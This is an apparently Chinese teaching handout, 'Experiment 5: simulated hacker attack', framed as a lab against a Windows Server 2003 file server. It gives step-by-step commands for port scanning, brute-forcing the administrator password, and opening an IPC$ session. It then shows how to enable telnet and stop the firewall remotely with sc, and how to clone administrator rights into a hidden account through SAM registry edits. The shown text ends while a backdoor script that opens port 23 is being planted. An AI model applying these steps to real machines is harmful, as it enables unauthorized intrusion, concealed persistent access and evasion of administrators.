实验五-模拟黑客攻击
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
实验五 模拟黑客攻击
实验环境:
本例以攻击一台文件服务器为例,演示通常的攻击方法和思路。该文件服务器默认安装了windows server 2003,启动了windows防火墙但是允许文件共享。其余设置全为默认安装设置,并安装了所有补丁。
A
B
VMNet2
文件服务器IP 1.1.1.1/8
客户机IP 1.1.1.2/8
需求描述:
➢扫描目标计算机
➢获得管理员权限
➢安装后门
➢清除攻击记录
实验步骤:
一、扫描目标计算机
a)在B计算机上使用扫描软件扫描目标计算机A,确定开放的端口,判断操作系统
的类型。
b)扫描软件推荐使用X-scan或流光。
X-SCAN:
使用流光:
打开流光主界面---右击IPC主机---编辑---添加目标主机
主机添加完后,生成字典---工具---字典工具---黑客字典III 生成字典
右击目标添加的主机---探测---探测所有IPC$远程登录
配置字典
探测报告
二、获得管理员权限
a)根据扫描结果,尝试暴力破解管理员账户的密码。
b)X-scan、流光、LC5等软件都提供了暴力破解功能。破解成功后会自动生
成报告。
三、入侵目标计算机
a)使用管理员的账户建立IPC链接,命令为"net use \\1.1.1.1\ipc$ 123456
/user:administrator"。
b)使用SC命令获取目标计算机的所有服务列表,并保存在本地,命令为“sc \\1.1.1.1
query type= service state= all > c:\1.txt”
c)打开1.txt文件,找到telnet,确认telnet服务的状态。
d)去除telnet服务的禁用状态,设置为自动运行,命令为“sc \\1.1.1.1 config tlntsvr
start= auto”。然后启用telnet服务,命令为“sc \\1.1.1.1 start tlntsvr”。
e)停用目标计算机的windows防火,命令为“sc \\1.1.1.1 stop sharedaccess”
f)确认目标计算机启用了远程注册表服务,命令为“sc \\1.1.1.1 qc remoteregistry”,
如果服务为停止状态,则将其启动。
四、添加隐藏账户
a)建立telnet连接,管理目标计算机,命令为“telnet 1.1.1.1”,连接成功后输入管理
员的账户名和密码
b)通过telnet,在目标计算机上建立隐藏账户,命令为“net user yt$ 111 /add”,其中
“$”符号用于在命令行里隐藏账户,但是在图形化管理工具里该账户还是可见的。
c)在本地运行“regedt32”,在“注册表编辑器”中选择“文件”——“连接网络注
册表”。
d)打开目标计算机的注册表,右击“hkey_local_machine”项下“sam”子项下的“sam”
子项,选择权限
e)在SAM的权限窗口中,赋予管理员完全控制权限。断开与目标计算机注册表的连
接,然后重新建立连接。
f)展开目标计算机的“hkey_local_machine\sam\sam\domains\account\users\names”项,
找到“administrator”和新建的账户yt$,记录他们的类型,本例中“administrator”
的类型为“0x1f4”,“yt$”的类型为“0x3eb”
g)展开目标计算机“hkey_local_machine\sam\sam\domains\account\users\names”项下
后三位是“1f4”的子项,该项和administrator项对应。
h)双击右侧窗格1f4项下的F键值,复制F键值下的全部数据。
i)展开目标计算机“hkey_local_machine\sam\sam\domains\account\users\names”项下
后三位是“3eb”的子项,使用从1f4项复制的数据覆盖“”项下F键值的数据。
j)导出目标计算机注册表的yt$项和000003eb项保存到本地,分别命名为yt.reg和*reg,然后将yt.reg和3eb.reg拷贝到\\1.1.1.1\c$下
k)返回到telnet命令行,删除目标计算机的账户yt$,命令为“net user yt$ /delete”。
l)在目标计算机上导入yt.reg和*.reg,命令为“reg import yt.reg”和“reg import 3eb.reg”,完成本步骤后将真正在目标计算机上建立一个隐藏账户,使用命令或图形工具都不能看到该账户、但是在注册表中可以看到。
m)删除目前和目标计算机的IPC连接,命令为“net use \\1.1.1.1 /delete”,使用新建的隐藏账户建立IPC链接,测试该账户是否建立正确并且足够的权限
n)打开目标计算机的注册表,右击“hkey_local_machine”项下“sam”子项下的“sam”
子项,选择权限。去除管理员组的读取和完全控制权限,恢复到默认状态。
五、保留管理后门、隐藏攻击痕迹
a)在本地建立一个名为open23.bat的脚本文件,文件内容如下:
Sc start sharedaccess
Netsh firewall add portopening all 23 enable
:end
b)将open23.bat文件拷贝到\\1.1.1.1\c$下。